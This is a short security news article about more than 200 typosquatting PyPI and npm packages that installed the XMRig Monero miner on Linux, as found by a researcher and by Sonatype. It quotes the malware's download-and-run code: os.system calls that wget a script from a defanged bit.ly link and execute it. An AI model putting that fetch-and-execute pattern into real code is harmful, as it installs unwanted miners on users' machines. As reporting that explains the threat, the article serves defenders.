Experts again found malware in the PyPI and npm repositories. This time it turned out that more than 200 packages use typesquatting and contain cryptocurrency miners for Linux systems.
The problem was first noticed by independent information security researcher Hauke Lubbers, who found “at least 33 packages” on PyPI that ran the XMRig miner that mines the Monero cryptocurrency. Typesquatting was used to distribute them, that is, packages were downloaded if the user mistyped the name of a real popular package (since developers usually download packages through the terminal, typos are common). For example, malware imitated React, argparse and AIOHTTP.
While Lubbers was notifying the PyPI administration of his discovery, the same attacker began publishing another set of 22 packages with the same payload.
The researcher says that all packages were targeted at Linux systems and contained a code fragment that downloaded a Bash script from the attacker’s server via the Bit.ly URL shortening service:
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
Lubbers explains that the URL on bit.ly points to a script hosted at 80.78.25[.]140:8000. Once executed, this script notifies its operator of the IP address of the compromised host and the successful deployment of the miner.
“I found these packages through my side project, which I call the Package Observatory Club,” Lubbers told Bleeping Computer. – It queries and saves metadata about all new packages uploaded to PyPI and RubyGems.org and then uses some heuristics. If a package looks suspicious, it alerts me and I take a look. Most of the time I get false positives, but PyPI has had a particularly large amount of typesquatting in the last week.”
Lubbers explains that he is doing this because “the cybersecurity community has There is a lot that comes from the open source ecosystem,” and he considers it his duty to pay back something for it:
“Whether it’s searching for vulnerabilities, helping to protect against intruders, or direct contributions. We must understand that most of the work of the package repositories rests on a small handful of volunteers, ”says the expert.
Almost at the same time as Hauke Lubbers, analysts at Sonatype discovered 186 other malicious packages on npm linked to the same URL to download a malicious Bash script.
Fortunately, both repositories quickly removed the typesquatting malware from their platforms, and the malicious packages were unlikely to cause much harm to the developers.